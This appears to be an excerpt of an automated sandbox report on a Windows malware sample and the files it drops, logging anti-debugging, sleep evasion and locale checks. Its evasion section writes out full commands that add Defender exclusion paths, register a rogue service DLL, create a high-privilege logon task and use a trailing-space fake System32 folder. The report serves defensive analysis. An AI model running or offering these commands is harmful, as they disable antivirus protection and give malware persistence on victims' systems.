Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\svchost.exe Thread delayed: delay time: 3600000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6899
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2891
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8096
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1402
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7392
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1990
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6970
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2671
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7385
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2132
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5951
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3679
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7309
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2325
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5854
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3814
Source: C:\Windows\System32\svchost.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_53-123038
Source: C:\Windows \System32\printui.exe Dropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exe Dropped PE file which has not been started: C:\Windows\System32\ucrtbased.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exe API coverage: 6.1 %
Source: C:\Windows\System32\svchost.exe API coverage: 2.2 %
Source: C:\Windows\System32\console_zero.exe API coverage: 1.7 %
Source: C:\Windows\System32\crypti.exe API coverage: 9.0 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824 Thread sleep count: 6899 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2264 Thread sleep count: 2891 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4632 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 1224 Thread sleep count: 82 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1524 Thread sleep count: 8096 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1524 Thread sleep count: 1402 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5588 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 4876 Thread sleep count: 79 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6540 Thread sleep count: 7392 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6540 Thread sleep count: 1990 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4148 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044 Thread sleep count: 6970 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044 Thread sleep count: 2671 > 30
Source: C:\Windows\System32\timeout.exe TID: 5956 Thread sleep count: 89 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6884 Thread sleep count: 7385 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6952 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1080 Thread sleep count: 2132 > 30
Source: C:\Windows\System32\svchost.exe TID: 1524 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1524 Thread sleep time: -28800000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6392 Thread sleep count: 5951 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6392 Thread sleep count: 3679 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 352 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\console_zero.exe TID: 4328 Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 2820 Thread sleep count: 90 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4236 Thread sleep count: 7309 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4236 Thread sleep count: 2325 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1708 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\console_zero.exe TID: 2128 Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3884 Thread sleep count: 5854 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7100 Thread sleep count: 3814 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5728 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeCode function: 53_2_64946F50 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 64946F63h53_2_64946F50
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E58E3C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,3_2_00007FF646E58E3C
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E58CF8 FindClose,FindFirstFileExW,GetLastError,3_2_00007FF646E58CF8
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E6D270 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00007FF646E6D270
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C70144 FindClose,FindFirstFileExW,GetLastError,59_2_00007FF6F8C70144
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C701B8 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,59_2_00007FF6F8C701B8
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C83764 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,59_2_00007FF6F8C83764
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D356D568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,84_2_00007FF6D356D568
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA96D568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,87_2_00007FF6EA96D568
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 60000
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 3600000
Source: C:\Windows\System32\console_zero.exeThread delayed: delay time: 50000
Source: Ld0f3NDosJ.exe, 00000003.00000002.2356433154.000001E8BF3D7000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000002.2356310555.000001E8BF369000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334869302.000001E8BF3D7000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334901082.000001E8BF368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000035.00000002.3360728429.000001BB8BA13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_3-18529
Source: C:\Windows\System32\console_zero.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E5B800 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF646E5B800
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55BB470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency,53_2_00007FFDA55BB470
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E71350 GetProcessHeap,3_2_00007FF646E71350
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E5B440 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF646E5B440
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E5B9E0 SetUnhandledExceptionFilter,3_2_00007FF646E5B9E0
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E6213C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF646E6213C
Source: C:\Windows \System32\printui.exeCode function: 40_2_00007FF68C621880 SetUnhandledExceptionFilter,40_2_00007FF68C621880
Source: C:\Windows \System32\printui.exeCode function: 40_2_00007FF68C621B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_00007FF68C621B5C
Source: C:\Windows\System32\svchost.exeCode function: 53_2_64947650 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,53_2_64947650
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6828C940 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,53_2_6828C940
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD942D9508 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_00007FFD942D9508
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFD942CB3B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,53_2_00007FFD942CB3B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33AEE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,53_2_00007FFDA33AEE70
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33AFA50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_00007FFDA33AFA50
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3797178 SetUnhandledExceptionFilter,53_2_00007FFDA3797178
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3796F94 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_00007FFDA3796F94
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3796630 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,53_2_00007FFDA3796630
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA553D768 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,53_2_00007FFDA553D768
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA553E24C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_00007FFDA553E24C
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55D57A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,53_2_00007FFDA55D57A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55D6224 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,53_2_00007FFDA55D6224
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C71AB4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_00007FF6F8C71AB4
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C71C94 SetUnhandledExceptionFilter,59_2_00007FF6F8C71C94
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C786CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_00007FF6F8C786CC
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FF6F8C71800 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,59_2_00007FF6F8C71800
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55D57A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,59_2_00007FFDA55D57A0
Source: C:\Windows\System32\console_zero.exeCode function: 59_2_00007FFDA55D6224 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,59_2_00007FFDA55D6224
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D354D3AC SetUnhandledExceptionFilter,84_2_00007FF6D354D3AC
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D354D1CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,84_2_00007FF6D354D1CC
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D355A8A8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,84_2_00007FF6D355A8A8
Source: C:\Windows\System32\crypti.exeCode function: 84_2_00007FF6D354CE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,84_2_00007FF6D354CE30
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA94CE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,87_2_00007FF6EA94CE30
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA94D3AC SetUnhandledExceptionFilter,87_2_00007FF6EA94D3AC
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA94D1CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,87_2_00007FF6EA94D1CC
Source: C:\Windows\System32\crypti.exeCode function: 87_2_00007FF6EA95A8A8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,87_2_00007FF6EA95A8A8

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\pyld64.exe "C:\Users\user\Desktop\pyld64.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\usvcinsta64.exe "C:\Windows\System32\usvcinsta64.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x543664
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Users\user\Desktop\pyld64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x543664 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x543664\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x543664.dat" /f && sc start x543664
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x543664 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x543664\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x543664.dat" /f && sc start x543664
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E57820 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,GetModuleFileNameW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF646E57820
Source: crypti.exe, 0000006C.00000002.3330121598.0000018C10B2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerPPDA
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: 3_2_00007FF646E73080 cpuid 3_2_00007FF646E73080
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00007FF646E71010
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: GetLocaleInfoW,3_2_00007FF646E69004
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: EnumSystemLocalesW,3_2_00007FF646E70914
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00007FF646E70E18
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,3_2_00007FF646E705B0
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: GetLocaleInfoW,3_2_00007FF646E70ECC
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: GetLocaleInfoEx,FormatMessageA,3_2_00007FF646E59694
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: GetLocaleInfoW,3_2_00007FF646E70CC0
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: EnumSystemLocalesW,3_2_00007FF646E68C90
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: EnumSystemLocalesW,3_2_00007FF646E709E4
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00007FF646E70A7C
Source: C:\Windows\System32\svchost.exeCode function: strtoul,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,strncmp,53_2_682864E0
Source: C:\Windows\System32\svchost.exeCode function: strchr,pthread_mutex_lock,strcmp,strncpy,EnumSystemLocalesA,pthread_mutex_unlock,strcpy,pthread_mutex_unlock,abort,53_2_68287D70
Source: C:\Windows\System32\svchost.exeCode function: getenv,GetLocaleInfoA,53_2_68286680
Source: C:\Windows\System32\svchost.exeCode function: memset,MultiByteToWideChar,GetLocaleInfoEx,malloc,malloc,strspn,53_2_00007FFDA3794B70
